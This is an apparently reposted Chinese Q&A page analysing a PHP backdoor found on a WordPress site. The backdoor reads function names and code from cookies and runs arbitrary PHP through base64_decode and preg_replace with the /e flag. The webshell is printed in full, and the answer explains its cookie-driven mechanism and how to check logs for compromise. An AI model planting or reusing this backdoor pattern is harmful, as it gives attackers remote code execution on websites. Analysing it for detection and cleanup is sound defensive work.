首页 / PHP / 从cookie执行PHP代码
从cookie执行PHP代码
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了从cookie执行PHP代码,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1592字,纯文字阅读大概需要3分钟。
内容图文
我发现了这么有趣的代码:
class PluginJoomla {
public function __construct() {
$jq = @$_COOKIE['ContentJQ3'];
if ($jq) {
$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438); die();
}
else
phpinfo();die;
}
}
$content = new PluginJoomla;
它是WordPress网站的一部分,因此请忽略类名.
如您所见,$jq变量是从某些Cookie文件获取其值的.后来,它似乎被视为一个函数:
$jq(@$_COOKIE['ContentJQ2']);
如您所见,这是使用Variable函数(https://php.net/manual/en/functions.variable-functions.php)的非常基本的PHP.
后来$jq变量函数返回$option变量的函数和$au变量的字符串:
$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438);
所以,我有一个问题,是否可以这样做,但是要从Cookie文件中执行PHP代码(不仅考虑exec()函数,还包括带有require()或使用ob_start()和ob_get_clean的此类文件) ())?
您还对代码本身有什么看法,它是某种病毒还是恶意软件?
解决方法:
它绝对是恶意的脚本.让我猜,您在/ wp-content / uploads / gravity_forms / …中找到了它?那是我在许多客户未更新其重力模板安装的站点上找到它的地方. (幸运的是,/ wp-content / uploads / *.php在我的服务器上被阻止.)
“ $option(” / 438 / e“,$au,438);”意味着由于/ e标志,当$option为preg_replace时执行$au.
通过$_COOKIE [‘ContentJQ3’] =“ base64_decode”,$_COOKIE [‘ContentJQ1’] = base64(“ preg_replace”)和$_COOKIE [‘ContentJQ2’] = base64(“ arbitrary_php_code();”),最终执行黑客喜欢的任何php代码.然后可以使用它从文件系统下载任何文件(PHP可以访问该文件;记住open_basedir),对数据库执行任何您喜欢的操作.
如果在文件系统上找到此文件,请检查访问日志以查看是否被黑客入侵.如果您不能证明自己不是,请考虑您的网站已遭到入侵.
内容总结
以上是互联网集市为您收集整理的从cookie执行PHP代码全部内容,希望文章能够帮你解决从cookie执行PHP代码所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。